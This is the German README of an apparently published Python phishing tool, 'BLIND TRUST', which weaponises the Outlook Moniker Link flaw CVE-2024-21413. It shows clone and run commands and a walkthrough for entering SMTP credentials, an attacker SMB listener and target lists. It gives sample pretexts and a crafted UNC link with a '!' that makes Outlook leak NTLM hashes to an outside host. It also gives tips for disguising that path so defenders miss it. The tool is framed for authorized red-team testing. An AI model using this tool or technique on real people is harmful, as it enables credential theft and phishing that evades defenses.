
Ein Tool für die Sicherheitsforschung zur Simulation gezielter Phishing-Kampagnen mittels CVE-2024-21413 (Moniker Link).
Ein Sicherheitsforschungs-Tool zur Simulation gezielter Phishing-Kampagnen mithilfe der CVE-2024-21413 Moniker-Link-Schwachstelle. Entwickelt für autorisierte Red-Team-Operationen, Penetrationstests und Security-Awareness-Training.
BLIND TRUST ist ein Phishing-Engagement-Framework, das Sicherheitsteams dabei hilft, ihre Abwehrmaßnahmen gegen hochentwickelte E-Mail-basierte Angriffe zu verstehen und zu testen. Es nutzt die Moniker-Link-Technik, um die Geschützte Ansicht von Outlook zu umgehen, und bietet eine realistische Angriffssimulation, mit der Organisationen ihre Sicherheitslage stärken können.
Dieses Tool automatisiert den gesamten Kampagnen-Workflow – von der Konfiguration bis zur E-Mail-Zustellung – und wahrt dabei die operative Sicherheit durch anpassbare UNC-Pfade und flexible Pretext-Optionen.
Organisationen müssen echte Angriffstechniken verstehen, um sich wirksam zu verteidigen. TRUST ermöglicht:
.txt-Dateien# Clone the repository
git clone https://github.com/h1ssbl1tz/Blind-Trust.git
cd TRUST
# Run the tool
python3 TRUST_v7.py
Das Tool verwendet ausschließlich Module aus der Python-Standardbibliothek:
getpass - Secure password input
html - HTML escaping
ipaddress - IP address validation
logging - Structured logging
os - File operations
re - Regular expressions
signal - Signal handling
smtplib - SMTP email protocol
sys - System utilities
time - Time operations
dataclasses - Configuration modeling
email - MIME email construction
typing - Type hints
Keine externen Pakete erforderlich – läuft überall mit Python 3.7+.
python3 TRUST_v7.py
Folgen Sie dem interaktiven Assistenten durch 5 Schritte:
Load targets from [f]ile or [i]nput directly?: i
Target email address(es): [email protected], [email protected]
Email subject [Security Update Required]: Urgent: Password Expiration Notice
Display name (From field) [Microsoft Security Center]: IT Security Team
Email body text: Your password expires in 24 hours. Please update immediately.
UNC host (IP or domain) [192.168.1.100]: it-internal.company.com
UNC share name [updates]: patches
UNC exploit name [patch]: kb_security_2024
Erstellen Sie targets.txt:
# Finance Department
[email protected]
[email protected]
[email protected]
# Accounting
[email protected]
[email protected]
Führen Sie dann aus:
Load targets from [f]ile or [i]nput directly?: f
Path to targets file: targets.txt
[+] Loaded 5 target(s) from targets.txt
Email subject: Q3 Financial Review - Action Required
Display name: Finance Operations Team
Email body: Please review the attached Q3 financial statement and provide approval.
UNC host: finance-internal.company.com
UNC share: quarterly
UNC exploit: q3_financial_report
Generated UNC path: file://finance-internal.company.com/quarterly!q3_financial_report
Zwei Optionen:
.txt-Datei mit einer E-Mail pro Zeile, Kommentare beginnen mit #Hier vermeiden Sie offensichtliche Signaturen:
finance-internal.company.com) anstelle einer bloßen IPquarterly, updates, documentsq3_report, security_patch, training_documentErgebnis: Statt des offensichtlichen \\192.168.1.100\share!exploit erhalten Sie etwa file://finance-internal.company.com/quarterly!q3_report.
Start
↓
[STEP 1] Prompt for attacker email and SMTP password
↓
[STEP 2] Prompt for SMB listener IP
↓
[STEP 3] Load target emails (file or input)
↓
↓→ For each target:
│ - Validate email format
│ - Check for duplicates
│
[STEP 4] Prompt for email pretext
│ - Subject, From name, body text
│
[STEP 5] Prompt for UNC path customization
│ - Host, share, exploit name
│
↓
[BUILD] Construct configuration object
↓
[VALIDATE] Check all fields are present and valid
↓
[SUMMARY] Display pre-send summary for review
↓
[CONFIRM] User approves or cancels
↓
[SEND] For each target:
│ - Build MIME email with custom Moniker Link
│ - Attempt SMTP delivery with retry logic
│ - Log per-target success/failure
│
↓
[REPORT] Display campaign results (delivered vs failed)
↓
Exit
CVE-2024-21413 (Moniker Link) ist eine Outlook-Schwachstelle, die das Einbetten von file://-URLs mit einem !-Zeichen ermöglicht. Wenn ein Benutzer auf einen solchen Link klickt, versucht Outlook, auf den UNC-Pfad zuzugreifen, was selbst im Modus „Geschützte Ansicht“ einen NTLM-Authentifizierungsversuch auslöst.